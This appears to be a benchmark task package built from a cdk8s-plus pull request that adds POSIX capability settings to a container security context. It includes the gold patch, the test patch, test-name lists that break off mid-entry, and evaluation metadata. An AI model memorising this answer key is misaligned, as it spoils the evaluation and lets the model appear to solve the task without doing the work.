[ "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "default security context", "custom security context", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "fromCommand", "fromHttpGet", "fromTcpSocket", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Enum: Capability Location: src/container.ts – exported enum `Capability` Inputs: *(none)* Outputs: string values representing POSIX capabilities (e.g., `CAP_AUDIT_CONTROL`, `CAP_BPF`, …) Description: Enumerates all supported POSIX capabilities that can be added to or dropped from a container’s security context. Interface: ContainerSecurityContextCapabilities Location: src/container.ts – exported interface `ContainerSecurityContextCapabilities` Inputs: - `add?: Capability[]` – list of capabilities to **add** to the container. - `drop?: Capability[]` – list of capabilities to **drop** from the container. Outputs: *(none)* Description: Shape of the object supplied to a security context to describe which capabilities should be added or removed. Interface: ContainerSecurityContextProps Location: src/container.ts – exported interface `ContainerSecurityContextProps` Inputs: all existing fields plus the new optional field: - `capabilities?: ContainerSecurityContextCapabilities` – POSIX capabilities configuration. Outputs: *(none)* Description: Configuration object used when constructing a `ContainerSecurityContext`; now supports specifying capability additions and removals. Property: ContainerSecurityContext.capabilities Location: src/container.ts – class `ContainerSecurityContext` (public readonly) Inputs: set via the `capabilities` field of `ContainerSecurityContextProps`. Outputs: `ContainerSecurityContextCapabilities | undefined` Description: Exposes the capabilities configuration on a container’s security context; tests read this property to verify the `add` and `drop` capability lists.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 196, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3817", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to add POSIX capabilities support to a container's security context. The test patch imports a Capability enum, adds a capabilities field to the security context, and asserts the correct values are emitted, which aligns with the intended feature. No signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs beyond the brief description, patch artifacts, or hidden domain knowledge are present. Therefore the task is solvable as described.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
68ea68125ca4d9b880b884d3faed186d6808688f
2024-04-18 16:56:53
cdk8s-team__cdk8s-plus-4055
diff --git a/src/container.ts b/src/container.ts index 28048a6e..79cc6dd4 100644 --- a/src/container.ts +++ b/src/container.ts @@ -7,6 +7,188 @@ import * as secret from './secret'; import { undefinedIfEmpty } from './utils'; import * as volume from './volume'; +/** + * Capability - complete list of POSIX capabilities + */ +export enum Capability { + /** + * CAP_AUDIT_CONTROL + */ + AUDIT_CONTROL = 'CAP_AUDIT_CONTROL', + /** + * CAP_AUDIT_READ + */ + AUDIT_READ = 'CAP_AUDIT_READ', + /** + * CAP_AUDIT_WRITE + */ + AUDIT_WRITE = 'CAP_AUDIT_WRITE', + /** + * CAP_BLOCK_SUSPEND + */ + BLOCK_SUSPEND = 'CAP_BLOCK_SUSPEND', + /** + * CAP_BPF + */ + BPF = 'CAP_BPF', + /** + * CAP_CHECKPOINT_RESTORE + */ + CHECKPOINT_RESTORE = 'CAP_CHECKPOINT_RESTORE', + /** + * CAP_CHOWN + */ + CHOWN = 'CAP_CHOWN', + /** + * CAP_DAC_OVERRIDE + */ + DAC_OVERRIDE = 'CAP_DAC_OVERRIDE', + /** + * CAP_DAC_READ_SEARCH + */ + DAC_READ_SEARCH = 'CAP_DAC_READ_SEARCH', + /** + * CAP_FOWNER + */ + FOWNER = 'CAP_FOWNER', + /** + * CAP_FSETID + */ + FSETID = 'CAP_FSETID', + /** + * CAP_IPC_LOCK + */ + IPC_LOCK = 'CAP_IPC_LOCK', + /** + * CAP_IPC_OWNER + */ + IPC_OWNER = 'CAP_IPC_OWNER', + /** + * CAP_KILL + */ + KILL = 'CAP_KILL', + /** + * CAP_LEASE + */ + LEASE = 'CAP_LEASE', + /** + * CAP_LINUX_IMMUTABLE + */ + LINUX_IMMUTABLE = 'CAP_LINUX_IMMUTABLE', + /** + * CAP_MAC_ADMIN + */ + MAC_ADMIN = 'CAP_MAC_ADMIN', + /** + * CAP_MAC_OVERRIDE + */ + MAC_OVERRIDE = 'CAP_MAC_OVERRIDE', + /** + * CAP_MKNOD + */ + MKNOD = 'CAP_MKNOD', + /** + * CAP_NET_ADMIN + */ + NET_ADMIN = 'CAP_NET_ADMIN', + /** + * CAP_NET_BIND_SERVICE + */ + NET_BIND_SERVICE = 'CAP_NET_BIND_SERVICE', + /** + * CAP_NET_BROADCAST + */ + NET_BROADCAST = 'CAP_NET_BROADCAST', + /** + * CAP_NET_RAW + */ + NET_RAW = 'CAP_NET_RAW', + /** + * CAP_PERFMON + */ + PERFMON = 'CAP_PERFMON', + /** + * CAP_SETGID + */ + SETGID = 'CAP_SETGID', + /** + * CAP_SETFCAP + */ + SETFCAP = 'CAP_SETFCAP', + /** + * CAP_SETPCAP + */ + SETPCAP = 'CAP_SETPCAP', + /** + * CAP_SETUID + */ + SETUID = 'CAP_SETUID', + /** + * CAP_SYS_ADMIN + */ + SYS_ADMIN = 'CAP_SYS_ADMIN', + /** + * CAP_SYS_BOOT + */ + SYS_BOOT = 'CAP_SYS_BOOT', + /** + * CAP_SYS_CHROOT + */ + SYS_CHROOT = 'CAP_SYS_CHROOT', + /** + * CAP_SYS_MODULE + */ + SYS_MODULE = 'CAP_SYS_MODULE', + /** + * CAP_SYS_NICE + */ + SYS_NICE = 'CAP_SYS_NICE', + /** + * CAP_SYS_PACCT + */ + SYS_PACCT = 'CAP_SYS_PACCT', + /** + * CAP_SYS_PTRACE + */ + SYS_PTRACE = 'CAP_SYS_PTRACE', + /** + * CAP_SYS_RAWIO + */ + SYS_RAWIO = 'CAP_SYS_RAWIO', + /** + * CAP_SYS_RESOURCE + */ + SYS_RESOURCE = 'CAP_SYS_RESOURCE', + /** + * CAP_SYS_TIME + */ + SYS_TIME = 'CAP_SYS_TIME', + /** + * CAP_SYS_TTY_CONFIG + */ + SYS_TTY_CONFIG = 'CAP_SYS_TTY_CONFIG', + /** + * CAP_SYSLOG + */ + SYSLOG = 'CAP_SYSLOG', + /** + * CAP_WAKE_ALARM + */ + WAKE_ALARM = 'CAP_WAKE_ALARM', +} + +export interface ContainerSecutiryContextCapabilities { + /** + * Added capabilities + */ + readonly add?: Capability[]; + + /** + * Removed capabilities + */ + readonly drop?: Capability[]; +} + /** * Properties for `ContainerSecurityContext` */ @@ -59,6 +241,13 @@ export interface ContainerSecurityContextProps { * @default false */ readonly allowPrivilegeEscalation?: boolean; + + /** + * POSIX capabilities for running containers + * + * @default none + */ + readonly capabilities?: ContainerSecutiryContextCapabilities; } /** @@ -137,6 +326,7 @@ export class ContainerSecurityContext { public readonly user?: number; public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; + public readonly capabilities?: ContainerSecutiryContextCapabilities; constructor(props: ContainerSecurityContextProps = {}) { this.ensureNonRoot = props.ensureNonRoot ?? true; @@ -145,6 +335,7 @@ export class ContainerSecurityContext { this.user = props.user; this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; + this.capabilities = props.capabilities; } /** @@ -158,6 +349,7 @@ export class ContainerSecurityContext { privileged: this.privileged, readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, + capabilities: this.capabilities, }; } @@ -330,7 +522,7 @@ export class EnvValue { * @param key - The key to extract the value from. * @param options - Additional options. */ - public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = { }): EnvValue { + public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = {}): EnvValue { const source: k8s.EnvVarSource = { configMapKeyRef: { @@ -432,7 +624,7 @@ export class EnvValue { return EnvValue.fromValue(value!); } - private constructor(public readonly value?: any, public readonly valueFrom?: any) {} + private constructor(public readonly value?: any, public readonly valueFrom?: any) { } } export enum ImagePullPolicy { @@ -810,7 +1002,7 @@ export class Container { * @param path - The desired path in the container. * @param storage - The storage to mount. */ - public mount(path: string, storage: volume.IStorage, options: MountOptions = { }) { + public mount(path: string, storage: volume.IStorage, options: MountOptions = {}) { this.mounts.push({ path, volume: storage.asVolume(), ...options }); } @@ -1094,7 +1286,7 @@ export class EnvFrom { constructor( private readonly configMap?: configmap.IConfigMap, private readonly prefix?: string, - private readonly sec?: secret.ISecret) {}; + private readonly sec?: secret.ISecret) { }; /** * @internal
feat(container): add capabilities to security context (#3817) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [feat(container): add capabilities to security context (#3817)](https://github.com/cdk8s-team/cdk8s-plus/pull/3817) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Expose POSIX capabilities in container security context **Problem** Users cannot currently specify which Linux capabilities a container should add or drop, limiting fine‑grained security configuration. The CDK8s Plus API therefore cannot express a common Kubernetes security feature. **Root Cause** The security‑context model lacked a property for capabilities, even though the underlying Kubernetes spec supports it. **Fix / Expected Behavior** - Introduce a comprehensive enumeration of POSIX capabilities. - Add a capability configuration object allowing explicit “add” and “drop” lists. - Extend the container security context properties to accept this capability configuration. - Ensure the capabilities are included in the generated pod spec when provided. - Preserve existing behavior when the property is omitted (no capabilities are set). **Risk & Validation** - The change adds only optional fields; existing manifests remain unchanged. - Verify that manifests generated with capabilities contain the correct `capabilities` block. - Run the full test suite and add tests for the new capability fields to guard against regressions.
4,055
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..13239370 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability } from '../src'; describe('EnvValue', () => { @@ -757,6 +757,7 @@ test('default security context', () => { runAsNonRoot: container.securityContext.ensureNonRoot, runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, + capabilities: container.securityContext.capabilities, }); }); @@ -770,6 +771,14 @@ test('custom security context', () => { privileged: true, user: 1000, group: 2000, + capabilities: { + add: [ + Capability.AUDIT_CONTROL, + ], + drop: [ + Capability.BPF, + ], + }, }, }); @@ -778,6 +787,8 @@ test('custom security context', () => { expect(container.securityContext.readOnlyRootFilesystem).toBeTruthy(); expect(container.securityContext.user).toEqual(1000); expect(container.securityContext.group).toEqual(2000); + expect(container.securityContext.capabilities?.add).toEqual(['CAP_AUDIT_CONTROL']); + expect(container.securityContext.capabilities?.drop).toEqual(['CAP_BPF']); });
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Can be isolated", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Can mutate metadata", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only 